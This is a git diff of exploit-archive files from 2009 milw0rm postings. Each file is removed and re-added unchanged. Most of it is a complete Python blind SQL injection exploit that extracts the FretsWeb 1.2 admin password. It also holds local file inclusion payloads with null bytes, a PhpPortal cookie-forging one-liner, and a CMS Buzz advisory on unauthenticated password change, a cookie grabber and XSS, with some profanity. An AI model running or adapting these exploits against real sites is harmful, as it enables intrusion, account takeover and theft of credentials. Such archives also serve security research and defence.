-**==[>    []     []        []   [][]   []  [] [][][]  []       [][]    []           [] []  >>--
-**  [----[[]]----[]--- ----[]-----[]---[]--[]-----[]--[]-------[] []---[]----------[]--[]---/ 
-   [>   [[[]]]   [][][][>  [][]   [] [][[] [[]]  [][]  [][][]  []  [>  [][][][> <][]   []    **
-**							                                     **
-**    											     **
-**                          ¡VIVA SPAIN!...¡GANAREMOS EL MUNDIAL!...o.O                      **
-**					¡PROUD TO BE SPANISH!				     **
-**											     **
-***********************************************************************************************
-***********************************************************************************************
-
-----------------------------------------------------------------------------------------------
-|       	   	    MULTIPLE LOCAL FILE INCLUSION VULNERABILITIES         	     |
-|--------------------------------------------------------------------------------------------|
-|                                    |      FretsWeb 1.2      |		    	             |
-|  CMS INFORMATION:          	      ------------------------	               	             |
-|										             |
-|-->WEB: http://sourceforge.net/projects/fretsweb/			       		     |
-|-->DOWNLOAD: http://sourceforge.net/projects/fretsweb/		                             |
-|-->DEMO: N/A										     |
-|-->CATEGORY: CMS / Games/Entertainment							     |
-|-->DESCRIPTION: Fretsweb is a Contest or Chart Server for Frets on Fire. It...              |
-|		is an improved version of FoFCS.It is meant for...          		     |
-|-->RELEASED: 2009-05-30								     |
-|											     |
-|  CMS VULNERABILITY:									     |
-|											     |
-|-->TESTED ON: firefox 3						                     |
-|-->DORK: N/A									             |
-|-->CATEGORY: LOCAL FILE INCLUSION (LFI) / INSECURE COOKIE HANDLING (LFI)	             |
-|-->AFFECT VERSION: CURRENT (MAYBE <= ?)				 		     |
-|-->Discovered Bug date: 2009-06-02							     |
-|-->Reported Bug date: 2009-06-02							     |
-|-->Fixed bug date: 2009-06-14								     |
-|-->Info patch: http://sourceforge.net/projects/fretsweb/				     |
-|-->Author: YEnH4ckEr									     |
-|-->mail: y3nh4ck3r[at]gmail[dot]com							     |
-|-->WEB/BLOG: N/A									     |
-|-->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo.       |
-|-->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!)			     |
-----------------------------------------------------------------------------------------------
-
-
-
-Note: Of course use null byte (%00) when you want to include a file with different extension to "php"
-
-
-
-###########################
-///////////////////////////
-
-LOCAL FILE INCLUSION (LFI):
-
-///////////////////////////
-###########################
-
-
-
-<<<<---------++++++++++++++ Condition: Nothing +++++++++++++++++--------->>>>
-
-
-
-[++] GET var --> 'language'
-
-
-
-~~~> http://[HOST]/[PATH]/charts.php?language=[LFI]%00
-
-
-
-###############################
-///////////////////////////////
-
-INSECURE COOKIE HANDLING (LFI):
-
-///////////////////////////////
-###############################
-
-
-
-[++] Cookie --> 'fretsweb_language'
-
-
-
-~~~> fretsweb_language=[LFI]%00
-
-
-
-<<<-----------------------------EOF---------------------------------->>>ENJOY IT!
-
-
-
-
-##############################################################################
-##############################################################################
-##**************************************************************************##
-##  SPECIAL THANKS TO: Str0ke and every H4ck3r(all who do milw0rm)!         ##
-##**************************************************************************##
-##--------------------------------------------------------------------------##
-##**************************************************************************##
-## GREETZ TO: JosS, Ulises2k, J.McCray, Evil1 and Spanish Hack3Rs community!##
-##**************************************************************************##
-##############################################################################
-##############################################################################
-
-# milw0rm.com [2009-06-17]
+***********************************************************************************************
+***********************************************************************************************
+**	       										     **
+**  											     **
+**     [] [] []  [][][][>  []     []  [][  ][]     []   [][]]  []  [>  [][][][>  [][][][]    **
+**     || || ||  []        [][]   []   []  []     []   []      [] []   []	 []    []    **
+** [>  [][][][]  [][][][>  [] []  []   []  []   [][]  []       [][]    [][][][>  []    []    **
+**  [-----[]-----[][][][>--[]--[]-[]---[][][]--[]-[]--[]--------[]-----[][][][>--[][][][]---\ 
+**==[>    []     []        []   [][]   []  [] [][][]  []       [][]    []           [] []  >>--
+**  [----[[]]----[]--- ----[]-----[]---[]--[]-----[]--[]-------[] []---[]----------[]--[]---/ 
+   [>   [[[]]]   [][][][>  [][]   [] [][[] [[]]  [][]  [][][]  []  [>  [][][][> <][]   []    **
+**							                                     **
+**    											     **
+**                          ¡VIVA SPAIN!...¡GANAREMOS EL MUNDIAL!...o.O                      **
+**					¡PROUD TO BE SPANISH!				     **
+**											     **
+***********************************************************************************************
+***********************************************************************************************
+
+----------------------------------------------------------------------------------------------
+|       	   	    MULTIPLE LOCAL FILE INCLUSION VULNERABILITIES         	     |
+|--------------------------------------------------------------------------------------------|
+|                                    |      FretsWeb 1.2      |		    	             |
+|  CMS INFORMATION:          	      ------------------------	               	             |
+|										             |
+|-->WEB: http://sourceforge.net/projects/fretsweb/			       		     |
+|-->DOWNLOAD: http://sourceforge.net/projects/fretsweb/		                             |
+|-->DEMO: N/A										     |
+|-->CATEGORY: CMS / Games/Entertainment							     |
+|-->DESCRIPTION: Fretsweb is a Contest or Chart Server for Frets on Fire. It...              |
+|		is an improved version of FoFCS.It is meant for...          		     |
+|-->RELEASED: 2009-05-30								     |
+|											     |
+|  CMS VULNERABILITY:									     |
+|											     |
+|-->TESTED ON: firefox 3						                     |
+|-->DORK: N/A									             |
+|-->CATEGORY: LOCAL FILE INCLUSION (LFI) / INSECURE COOKIE HANDLING (LFI)	             |
+|-->AFFECT VERSION: CURRENT (MAYBE <= ?)				 		     |
+|-->Discovered Bug date: 2009-06-02							     |
+|-->Reported Bug date: 2009-06-02							     |
+|-->Fixed bug date: 2009-06-14								     |
+|-->Info patch: http://sourceforge.net/projects/fretsweb/				     |
+|-->Author: YEnH4ckEr									     |
+|-->mail: y3nh4ck3r[at]gmail[dot]com							     |
+|-->WEB/BLOG: N/A									     |
+|-->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo.       |
+|-->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!)			     |
+----------------------------------------------------------------------------------------------
+
+
+
+Note: Of course use null byte (%00) when you want to include a file with different extension to "php"
+
+
+
+###########################
+///////////////////////////
+
+LOCAL FILE INCLUSION (LFI):
+
+///////////////////////////
+###########################
+
+
+
+<<<<---------++++++++++++++ Condition: Nothing +++++++++++++++++--------->>>>
+
+
+
+[++] GET var --> 'language'
+
+
+
+~~~> http://[HOST]/[PATH]/charts.php?language=[LFI]%00
+
+
+
+###############################
+///////////////////////////////
+
+INSECURE COOKIE HANDLING (LFI):
+
+///////////////////////////////
+###############################
+
+
+
+[++] Cookie --> 'fretsweb_language'
+
+
+
+~~~> fretsweb_language=[LFI]%00
+
+
+
+<<<-----------------------------EOF---------------------------------->>>ENJOY IT!
+
+
+
+
+##############################################################################
+##############################################################################
+##**************************************************************************##
+##  SPECIAL THANKS TO: Str0ke and every H4ck3r(all who do milw0rm)!         ##
+##**************************************************************************##
+##--------------------------------------------------------------------------##
+##**************************************************************************##
+## GREETZ TO: JosS, Ulises2k, J.McCray, Evil1 and Spanish Hack3Rs community!##
+##**************************************************************************##
+##############################################################################
+##############################################################################
+
+# milw0rm.com [2009-06-17]
diff --git a/platforms/php/webapps/8980.py b/platforms/php/webapps/8980.py
index ccb8aa643..467027244 100755
--- a/platforms/php/webapps/8980.py
+++ b/platforms/php/webapps/8980.py
@@ -1,223 +1,223 @@
-#!/usr/bin/python
-#***********************************************************************************************
-#***********************************************************************************************
-#**	       										      **
-#**  											      **
-#**     [] [] []  [][][][>  []     []  [][  ][]     []   [][]]  []  [>  [][][][>  [][][][]    **
-#**     || || ||  []        [][]   []   []  []     []   []      [] []   []	  []    []    **
-#   [>  [][][][]  [][][][>  [] []  []   []  []   [][]  []       [][]    [][][][>  []    []    **
-#**  [-----[]-----[][][][>--[]--[]-[]---[][][]--[]-[]--[]--------[]-----[][][][>--[][][][]---\ 
-#**==[>    []     []        []   [][]   []  [] [][][]  []       [][]    []           [] []  >>--
-#**  [----[[]]----[]--- ----[]-----[]---[]--[]-----[]--[]-------[] []---[]----------[]--[]---/ 
-#   [>   [[[]]]   [][][][>  [][]   [] [][[] [[]]  [][]  [][][]  []  [>  [][][][> <][]   []    
-#**							                                      **
-#**    											      **
-#**                           VIVA SPAIN!... GANAREMOS EL MUNDIAL!...o.O                      **
-#**					   PROUD TO BE SPANISH!	                              **
-#**											      **
-#***********************************************************************************************
-#***********************************************************************************************
-#
-#---------------------------------------------------------------------------------------------
-#|       	   	     (GET var 'name') BLIND SQL INJECTION EXPLOIT      	             |
-#|-------------------------------------------------------------------------------------------|
-#|                                    |      FretsWeb 1.2      |		    	     |
-#|  CMS INFORMATION:          	      ------------------------	               	             |
-#|										             |
-#|-->WEB: http://sourceforge.net/projects/fretsweb/			       		     |
-#|-->DOWNLOAD: http://sourceforge.net/projects/fretsweb/		                     |
-#|-->DEMO: N/A										     |
-#|-->CATEGORY: CMS / Games/Entertainment						     |
-#|-->DESCRIPTION: Fretsweb is a Contest or Chart Server for Frets on Fire. It...             |
-#|		is an improved version of FoFCS.It is meant for...          		     |
-#|-->RELEASED: 2009-05-30								     |
-#|											     |
-#|  CMS VULNERABILITY:									     |
-#|											     |
-#|-->TESTED ON: firefox 3						                     |
-#|-->DORK: N/A									             |
-#|-->CATEGORY: BLIND SQLi PYTHON EXPLOIT					             |
-#|-->AFFECT VERSION: CURRENT (MAYBE <= ?)				 		     |
-#|-->Discovered Bug date: 2009-06-02							     |
-#|-->Reported Bug date: 2009-06-02							     |
-#|-->Fixed bug date: 2009-06-14								     |
-#|-->Info patch: http://sourceforge.net/projects/fretsweb/				     |
-#|-->Author: YEnH4ckEr									     |
-#|-->mail: y3nh4ck3r[at]gmail[dot]com							     |
-#|-->WEB/BLOG: N/A									     |
-#|-->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo.      |
-#|-->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!)		     |
-#---------------------------------------------------------------------------------------------
-#
-#------------
-#CONDITIONS:
-#------------
-#
-#magic quotes=OFF
-#
-#-------
-#NEED:
-#-------
-#
-#Valid name
-#
-#---------------------------------------
-#PROOF OF CONCEPT (SQL INJECTION):
-#---------------------------------------
-#
-#http://[HOST]/[PATH]/player.php?name=[valid_name]'+and+1=1%23 --> TRUE
-#http://[HOST]/[PATH]/player.php?name=[valid_name]'+AND+1=0%23 --> FALSE
-#
-#
-#http://[HOST]/[PATH]/song.php?hash=[valid_song]'+and+1=1%23 --> TRUE
-#http://[HOST]/[PATH]/song.php?hash=[valid_song]'+and+1=0%23 --> FALSE
-#
-#--------------
-#WATCH VIDEOS
-#--------------
-#
-# BSQLi --> http://www.youtube.com/watch?v=BYrkuAN2ggI
-#
-# LFI --> http://www.youtube.com/watch?v=LZ8cG_sIHow
-#
-#
-##############################################################################
-##############################################################################
-##**************************************************************************##
-##  SPECIAL THANKS TO: Str0ke and every H4ck3r(all who do milw0rm)!         ##
-##**************************************************************************##
-##--------------------------------------------------------------------------##
-##**************************************************************************##
-## GREETZ TO: JosS, Ulises2k, J.McCray, Evil1 and Spanish Hack3Rs community!##
-##**************************************************************************##
-##############################################################################
-##############################################################################
-#
-#Used modules
-import urllib,sys,re,os
-#Defined functions
-def init():
-	if(sys.platform=='win32'):
-		os.system("cls")
-		os.system ("title FretsWeb 1.2 Blind SQL Injection Exploit")
-		os.system ("color 02")
-	else:
-		os.sytem("clear")
-	print "\t#######################################################\n\n"
-	print "\t#######################################################\n\n"
-	print "\t##     FretsWeb 1.2 Blind SQL Injection Exploit      ##\n\n"
-	print "\t##       ++Conditions: magic_quotes=OFF              ##\n\n"
-	print "\t##       ++Needed: Valid name                        ##\n\n"
-	print "\t##               Author: Y3nh4ck3r                   ##\n\n"
-	print "\t##      Contact:y3nh4ck3r[at]gmail[dot]com           ##\n\n"
-	print "\t##            Proud to be Spanish!                   ##\n\n"
-	print "\t#######################################################\n\n"
-	print "\t#######################################################\n\n"
-	
-def request(urltarget):
-	conn=urllib.urlopen(urltarget)
-	outcode=conn.read()
-	#print outcode #--> Active this line for debugger mode
-	return outcode
-
-def error():
-	print "\t------------------------------------------------------------\n"
-	print "\tWeb isn't vulnerable!\n\n"
-	print "\t--->Maybe:\n\n"
-	print "\t\t1.-Patched.\n"
-	print "\t\t2.-Bad path or host.\n"
-	print "\t\t3.-Bad name.\n"
-	print "\t\t4.-Magic quotes ON.\n"
-	print "\t\tEXPLOIT FAILED!\n"
-	print "\t------------------------------------------------------------\n"
-	sys.exit()
-
-def testedblindsql():
-	print "\t-----------------------------------------------------------------\n"
-	print "\tWEB MAYBE BE VULNERABLE!\n\n"
-	print "\tTested Blind SQL Injection.\n"		
-	print "\tStarting exploit...\n"
-	print "\t-----------------------------------------------------------------\n\n"
-
-def helper(filename):
-	print "\n\t[!!!] FretsWeb 1.2 Blind SQL Injection Exploit\n"
-	print "\t[!!!] USAGE MODE: [!!!]\n"
-	print "\t[!!!] python "+filename+" [HOST] [PATH] [NAME]\n"
-	print "\t[!!!] [HOST]: Web.\n"
-	print "\t[!!!] [PATH]: Home Path.\n"
-	print "\t[!!!] [NAME]: Name for fish\n"
-	print "\t[!!!] Example: python "+filename+" 'www.example.com' 'demo' 'y3nh4ck3r'\n"
-	sys.exit()
-	
-def brute_length(urlrequest):
-	#Username length
-	flag=1
-	i=0
-	while(flag==1):
-		i=i+1
-		blindsql=urlrequest+"'+AND+(SELECT+length(value)+FROM+contest_config+WHERE+name='admin_password')="+str(i)+"%23" #injected code
-		output=request(blindsql)
-		if(re.search("Fretsweb - Player",output)):
-			flag=2
-		else:
-			flag=1
-		#This is the max length of username
-		if (i>50):
-			error()
-		#Save column length
-	length=i
-	print "\t<<<<<--------------------------------------------------------->>>>>\n"
-	print "\tLength catched!\n"
-	print "\tLength Username --> "+str(length)+"\n"
-	print "\tWait several minutes...\n"
-	print "\t<<<<<--------------------------------------------------------->>>>>\n\n"
-	return length
-	
-def exploiting (lengthvalue,urlrequest):
-	#Bruteforcing values
-	values=""
-	k=1
-	z=32
-	while((k<=lengthvalue) and (z<=126)):
-		blindsql=urlrequest+"'+AND+ascii(substring((SELECT+value+FROM+contest_config+WHERE+name='admin_password'),"+str(k)+",1))="+str(z)+"%23" #injected code
-		output=request(blindsql)
-		if(re.search("Fretsweb - Player",output)):
-			values=values+chr(z)
-			k=k+1
-			z=32
-#new char
-		z=z+1 
-	return values
-#Main
-init()
-#Init variables
-if(len(sys.argv) <= 3):
-    helper(sys.argv[0])
-
-host=sys.argv[1]
-path=sys.argv[2]
-nameforfish=sys.argv[3]
-finalrequest="http://"+host+"/"+path+"/player.php?name="+nameforfish
-testblind1=finalrequest+"'+AND+1=1%23" #Return true
-outcode1=request(testblind1)
-testblind2=finalrequest+"'+AND+1=0%23" #Return false
-outcode2=request(testblind2)
-#Check BSQLi
-if(outcode1==outcode2):
-	error()
-else:
-	testedblindsql()
-#Catching length of admin password
-lengthadmin=brute_length(finalrequest)
-#Catching value of password (not hashed)
-passwordadmin=exploiting(lengthadmin,finalrequest)
-print "\n\t\t*************************************************\n"
-print "\t\t*********  EXPLOIT EXECUTED SUCCESSFULLY ********\n"
-print "\t\t*************************************************\n\n"
-print "\t\tAdmin-password: "+passwordadmin+"\n\n"
-print "\n\t\t<<----------------------FINISH!-------------------->>\n\n"
-print "\t\t<<---------------Thanks to: y3nh4ck3r-------------->>\n\n"
-print "\t\t<<------------------------EOF---------------------->>\n\n"
-#Check all arguments
-
-# milw0rm.com [2009-06-17]
+#!/usr/bin/python
+#***********************************************************************************************
+#***********************************************************************************************
+#**	       										      **
+#**  											      **
+#**     [] [] []  [][][][>  []     []  [][  ][]     []   [][]]  []  [>  [][][][>  [][][][]    **
+#**     || || ||  []        [][]   []   []  []     []   []      [] []   []	  []    []    **
+#   [>  [][][][]  [][][][>  [] []  []   []  []   [][]  []       [][]    [][][][>  []    []    **
+#**  [-----[]-----[][][][>--[]--[]-[]---[][][]--[]-[]--[]--------[]-----[][][][>--[][][][]---\ 
+#**==[>    []     []        []   [][]   []  [] [][][]  []       [][]    []           [] []  >>--
+#**  [----[[]]----[]--- ----[]-----[]---[]--[]-----[]--[]-------[] []---[]----------[]--[]---/ 
+#   [>   [[[]]]   [][][][>  [][]   [] [][[] [[]]  [][]  [][][]  []  [>  [][][][> <][]   []    
+#**							                                      **
+#**    											      **
+#**                           VIVA SPAIN!... GANAREMOS EL MUNDIAL!...o.O                      **
+#**					   PROUD TO BE SPANISH!	                              **
+#**											      **
+#***********************************************************************************************
+#***********************************************************************************************
+#
+#---------------------------------------------------------------------------------------------
+#|       	   	     (GET var 'name') BLIND SQL INJECTION EXPLOIT      	             |
+#|-------------------------------------------------------------------------------------------|
+#|                                    |      FretsWeb 1.2      |		    	     |
+#|  CMS INFORMATION:          	      ------------------------	               	             |
+#|										             |
+#|-->WEB: http://sourceforge.net/projects/fretsweb/			       		     |
+#|-->DOWNLOAD: http://sourceforge.net/projects/fretsweb/		                     |
+#|-->DEMO: N/A										     |
+#|-->CATEGORY: CMS / Games/Entertainment						     |
+#|-->DESCRIPTION: Fretsweb is a Contest or Chart Server for Frets on Fire. It...             |
+#|		is an improved version of FoFCS.It is meant for...          		     |
+#|-->RELEASED: 2009-05-30								     |
+#|											     |
+#|  CMS VULNERABILITY:									     |
+#|											     |
+#|-->TESTED ON: firefox 3						                     |
+#|-->DORK: N/A									             |
+#|-->CATEGORY: BLIND SQLi PYTHON EXPLOIT					             |
+#|-->AFFECT VERSION: CURRENT (MAYBE <= ?)				 		     |
+#|-->Discovered Bug date: 2009-06-02							     |
+#|-->Reported Bug date: 2009-06-02							     |
+#|-->Fixed bug date: 2009-06-14								     |
+#|-->Info patch: http://sourceforge.net/projects/fretsweb/				     |
+#|-->Author: YEnH4ckEr									     |
+#|-->mail: y3nh4ck3r[at]gmail[dot]com							     |
+#|-->WEB/BLOG: N/A									     |
+#|-->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo.      |
+#|-->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!)		     |
+#---------------------------------------------------------------------------------------------
+#
+#------------
+#CONDITIONS:
+#------------
+#
+#magic quotes=OFF
+#
+#-------
+#NEED:
+#-------
+#
+#Valid name
+#
+#---------------------------------------
+#PROOF OF CONCEPT (SQL INJECTION):
+#---------------------------------------
+#
+#http://[HOST]/[PATH]/player.php?name=[valid_name]'+and+1=1%23 --> TRUE
+#http://[HOST]/[PATH]/player.php?name=[valid_name]'+AND+1=0%23 --> FALSE
+#
+#
+#http://[HOST]/[PATH]/song.php?hash=[valid_song]'+and+1=1%23 --> TRUE
+#http://[HOST]/[PATH]/song.php?hash=[valid_song]'+and+1=0%23 --> FALSE
+#
+#--------------
+#WATCH VIDEOS
+#--------------
+#
+# BSQLi --> http://www.youtube.com/watch?v=BYrkuAN2ggI
+#
+# LFI --> http://www.youtube.com/watch?v=LZ8cG_sIHow
+#
+#
+##############################################################################
+##############################################################################
+##**************************************************************************##
+##  SPECIAL THANKS TO: Str0ke and every H4ck3r(all who do milw0rm)!         ##
+##**************************************************************************##
+##--------------------------------------------------------------------------##
+##**************************************************************************##
+## GREETZ TO: JosS, Ulises2k, J.McCray, Evil1 and Spanish Hack3Rs community!##
+##**************************************************************************##
+##############################################################################
+##############################################################################
+#
+#Used modules
+import urllib,sys,re,os
+#Defined functions
+def init():
+	if(sys.platform=='win32'):
+		os.system("cls")
+		os.system ("title FretsWeb 1.2 Blind SQL Injection Exploit")
+		os.system ("color 02")
+	else:
+		os.sytem("clear")
+	print "\t#######################################################\n\n"
+	print "\t#######################################################\n\n"
+	print "\t##     FretsWeb 1.2 Blind SQL Injection Exploit      ##\n\n"
+	print "\t##       ++Conditions: magic_quotes=OFF              ##\n\n"
+	print "\t##       ++Needed: Valid name                        ##\n\n"
+	print "\t##               Author: Y3nh4ck3r                   ##\n\n"
+	print "\t##      Contact:y3nh4ck3r[at]gmail[dot]com           ##\n\n"
+	print "\t##            Proud to be Spanish!                   ##\n\n"
+	print "\t#######################################################\n\n"
+	print "\t#######################################################\n\n"
+	
+def request(urltarget):
+	conn=urllib.urlopen(urltarget)
+	outcode=conn.read()
+	#print outcode #--> Active this line for debugger mode
+	return outcode
+
+def error():
+	print "\t------------------------------------------------------------\n"
+	print "\tWeb isn't vulnerable!\n\n"
+	print "\t--->Maybe:\n\n"
+	print "\t\t1.-Patched.\n"
+	print "\t\t2.-Bad path or host.\n"
+	print "\t\t3.-Bad name.\n"
+	print "\t\t4.-Magic quotes ON.\n"
+	print "\t\tEXPLOIT FAILED!\n"
+	print "\t------------------------------------------------------------\n"
+	sys.exit()
+
+def testedblindsql():
+	print "\t-----------------------------------------------------------------\n"
+	print "\tWEB MAYBE BE VULNERABLE!\n\n"
+	print "\tTested Blind SQL Injection.\n"		
+	print "\tStarting exploit...\n"
+	print "\t-----------------------------------------------------------------\n\n"
+
+def helper(filename):
+	print "\n\t[!!!] FretsWeb 1.2 Blind SQL Injection Exploit\n"
+	print "\t[!!!] USAGE MODE: [!!!]\n"
+	print "\t[!!!] python "+filename+" [HOST] [PATH] [NAME]\n"
+	print "\t[!!!] [HOST]: Web.\n"
+	print "\t[!!!] [PATH]: Home Path.\n"
+	print "\t[!!!] [NAME]: Name for fish\n"
+	print "\t[!!!] Example: python "+filename+" 'www.example.com' 'demo' 'y3nh4ck3r'\n"
+	sys.exit()
+	
+def brute_length(urlrequest):
+	#Username length
+	flag=1
+	i=0
+	while(flag==1):
+		i=i+1
+		blindsql=urlrequest+"'+AND+(SELECT+length(value)+FROM+contest_config+WHERE+name='admin_password')="+str(i)+"%23" #injected code
+		output=request(blindsql)
+		if(re.search("Fretsweb - Player",output)):
+			flag=2
+		else:
+			flag=1
+		#This is the max length of username
+		if (i>50):
+			error()
+		#Save column length
+	length=i
+	print "\t<<<<<--------------------------------------------------------->>>>>\n"
+	print "\tLength catched!\n"
+	print "\tLength Username --> "+str(length)+"\n"
+	print "\tWait several minutes...\n"
+	print "\t<<<<<--------------------------------------------------------->>>>>\n\n"
+	return length
+	
+def exploiting (lengthvalue,urlrequest):
+	#Bruteforcing values
+	values=""
+	k=1
+	z=32
+	while((k<=lengthvalue) and (z<=126)):
+		blindsql=urlrequest+"'+AND+ascii(substring((SELECT+value+FROM+contest_config+WHERE+name='admin_password'),"+str(k)+",1))="+str(z)+"%23" #injected code
+		output=request(blindsql)
+		if(re.search("Fretsweb - Player",output)):
+			values=values+chr(z)
+			k=k+1
+			z=32
+#new char
+		z=z+1 
+	return values
+#Main
+init()
+#Init variables
+if(len(sys.argv) <= 3):
+    helper(sys.argv[0])
+
+host=sys.argv[1]
+path=sys.argv[2]
+nameforfish=sys.argv[3]
+finalrequest="http://"+host+"/"+path+"/player.php?name="+nameforfish
+testblind1=finalrequest+"'+AND+1=1%23" #Return true
+outcode1=request(testblind1)
+testblind2=finalrequest+"'+AND+1=0%23" #Return false
+outcode2=request(testblind2)
+#Check BSQLi
+if(outcode1==outcode2):
+	error()
+else:
+	testedblindsql()
+#Catching length of admin password
+lengthadmin=brute_length(finalrequest)
+#Catching value of password (not hashed)
+passwordadmin=exploiting(lengthadmin,finalrequest)
+print "\n\t\t*************************************************\n"
+print "\t\t*********  EXPLOIT EXECUTED SUCCESSFULLY ********\n"
+print "\t\t*************************************************\n\n"
+print "\t\tAdmin-password: "+passwordadmin+"\n\n"
+print "\n\t\t<<----------------------FINISH!-------------------->>\n\n"
+print "\t\t<<---------------Thanks to: y3nh4ck3r-------------->>\n\n"
+print "\t\t<<------------------------EOF---------------------->>\n\n"
+#Check all arguments
+
+# milw0rm.com [2009-06-17]
diff --git a/platforms/php/webapps/8981.txt b/platforms/php/webapps/8981.txt
index cbd33a555..56af1e917 100755
--- a/platforms/php/webapps/8981.txt
+++ b/platforms/php/webapps/8981.txt
@@ -1,21 +1,21 @@
-########################################################
-PhpPortal v1 Insecure Cookie Handling Vulnerability
-########################################################
-
-Author : KnocKout
-Special Thankz : CW All users
-Script : http://phportal.mertindualari.com
-
-########################################################
-
-Exploit;
-
-javascript:document.cookie="kulladi=[Username];path=/";
-Enter..
-
-Go To; http://target.com/uye_paneli.php?islem=bilgilerim
-
-
-########################################################
-
-# milw0rm.com [2009-06-17]
+########################################################
+PhpPortal v1 Insecure Cookie Handling Vulnerability
+########################################################
+
+Author : KnocKout
+Special Thankz : CW All users
+Script : http://phportal.mertindualari.com
+
+########################################################
+
+Exploit;
+
+javascript:document.cookie="kulladi=[Username];path=/";
+Enter..
+
+Go To; http://target.com/uye_paneli.php?islem=bilgilerim
+
+
+########################################################
+
+# milw0rm.com [2009-06-17]
diff --git a/platforms/php/webapps/8984.txt b/platforms/php/webapps/8984.txt
index 2b7b8ac0d..b707384c6 100755
--- a/platforms/php/webapps/8984.txt
+++ b/platforms/php/webapps/8984.txt
@@ -1,67 +1,67 @@
-#################################################################################################################
-[+] CMS Buzz (xss/Change Password)Multiple Remote Vulnerabilities
-[+] Discovered By ThE g0bL!N
-[+] Vendor:cmsbuzz.com
-[+] Note : If you are The S3r!0uS  I say To Fuck you Because You are Hacked  Site Of My Best Friends dz-boys.com
-[+] Demo:http://demo.cmsbuzz.com/
-[+] Greeting : All my freinds ( Dz )
-#################################################################################################################
-Remote Changing Password:
-+++++++++++++++++++++++++
-1) You Must Register In ThE site http://www.victim.com/?action=register
-2) Login
-3) Go To url:
-    http:///www.victim.com/?action=profile&user= [ Name Of user ]
-Example
-http:///www.victim.com/?action=profile&user=admin
-Change admin Password Then go To login http://path/?action=login
-Cross Site Scritping
-++++++++++++++++++++
-http://www.victim.com/?action=search
-
-
-#################################################################################################################
-[+] CMS Buzz Cookie Grabber Exploit& HTML Injection
-[+] Discovered By ThE g0bL!N
-[+] Vendor:http://msbuzz.com/
-[+] Fuck You The S3r!0uS
-#################################################################################################################
-PoC
---
-[+] Make 2 files and upload to your host :
-[+]cookie.php  - > Put in this File That Code:
- 
-[+]log.txt   - > CHMOD it 777 and put in the same directory with cookie.php
- 
-[+]Exploit:
-   -------
-1) Register in The SIte
-2) Go to send message http://path/?action=compose
-3)We Put in
-  To:admin name
-  Subject: Some Subject
-  Message: 
-  The js code Worked When The admin Read The Message
-+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
-2) HTML Injection
-+++++++++++++++++
-1) Register :p
-2) Go to send message http://path/?action=compose
-3)We Put in
-  To:admin name
-  Subject: Some Subject
-  Message: 1)XSS:PoC :
-             ---------
-           2)Poc: Iframe :">
-       -------------
-     3)PoC : Redirection:">"">>>> ""
-     -------------------
-     DEMO:http://demo.cmsbuzz.com
-################################################################################################################
-
-# milw0rm.com [2009-06-18]
+#################################################################################################################
+[+] CMS Buzz (xss/Change Password)Multiple Remote Vulnerabilities
+[+] Discovered By ThE g0bL!N
+[+] Vendor:cmsbuzz.com
+[+] Note : If you are The S3r!0uS  I say To Fuck you Because You are Hacked  Site Of My Best Friends dz-boys.com
+[+] Demo:http://demo.cmsbuzz.com/
+[+] Greeting : All my freinds ( Dz )
+#################################################################################################################
+Remote Changing Password:
++++++++++++++++++++++++++
+1) You Must Register In ThE site http://www.victim.com/?action=register
+2) Login
+3) Go To url:
+    http:///www.victim.com/?action=profile&user= [ Name Of user ]
+Example
+http:///www.victim.com/?action=profile&user=admin
+Change admin Password Then go To login http://path/?action=login
+Cross Site Scritping
+++++++++++++++++++++
+http://www.victim.com/?action=search
+
+
+#################################################################################################################
+[+] CMS Buzz Cookie Grabber Exploit& HTML Injection
+[+] Discovered By ThE g0bL!N
+[+] Vendor:http://msbuzz.com/
+[+] Fuck You The S3r!0uS
+#################################################################################################################
+PoC
+--
+[+] Make 2 files and upload to your host :
+[+]cookie.php  - > Put in this File That Code:
+ 
+[+]log.txt   - > CHMOD it 777 and put in the same directory with cookie.php
+ 
+[+]Exploit:
+   -------
+1) Register in The SIte
+2) Go to send message http://path/?action=compose
+3)We Put in
+  To:admin name
+  Subject: Some Subject
+  Message: 
+  The js code Worked When The admin Read The Message
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+2) HTML Injection
++++++++++++++++++
+1) Register :p
+2) Go to send message http://path/?action=compose
+3)We Put in
+  To:admin name
+  Subject: Some Subject
+  Message: 1)XSS:PoC :
+             ---------
+           2)Poc: Iframe :">
+       -------------
+     3)PoC : Redirection:">"">>>> ""
+     -------------------
+     DEMO:http://demo.cmsbuzz.com
+################################################################################################################
+
+# milw0rm.com [2009-06-18]
diff --git a/platforms/php/webapps/8988.txt b/platforms/php/webapps/8988.txt
index c7140f977..6992537a3 100755
--- a/platforms/php/webapps/8988.txt
+++ b/platforms/php/webapps/8988.txt
@@ -1,144 +1,144 @@
-                                            ||          ||   | ||
-                                     o_,_7 _||  . _o_7 _|| q_|_||  o_\\\_,
-                                    (  :  /    (_)    /           (      .
-
-                                             ___________________
-                                           _/QQQQQQQQQQQQQQQQQQQ\__
-                                        __/QQQ/````````````````\QQQ\___
-                                      _/QQQQQ/                  \QQQQQQ\
-                                     /QQQQ/``                    ```QQQQ\
-                                    /QQQQ/ Advisory                 \QQQQ\
-                                   |QQQQ/    By      Qabandi         \QQQQ|
-                                   |QQQQ|                            |QQQQ|
-                                   |QQQQ|    From Kuwait, PEACE...   |QQQQ|
-                                   |QQQQ|                            |QQQQ|
-                                   |QQQQ\       iqa[a]hotmail.fr     /QQQQ|
-                                    \QQQQ\                      __  /QQQQ/
-                                     \QQQQ\                    /QQ\_QQQQ/
-                                      \QQQQ\                   \QQQQQQQ/
-                                       \QQQQQ\                 /QQQQQ/_
-                                        ``\QQQQQ\_____________/QQQ/\QQQQ\_
-                                           ``\QQQQQQQQQQQQQQQQQQQ/  `\QQQQ\
-                                              ```````````````````     `````
-
-=Vuln:		pc4arb - pc4 Uploader <= 10.0 Remote File Disclosure Vulnerability
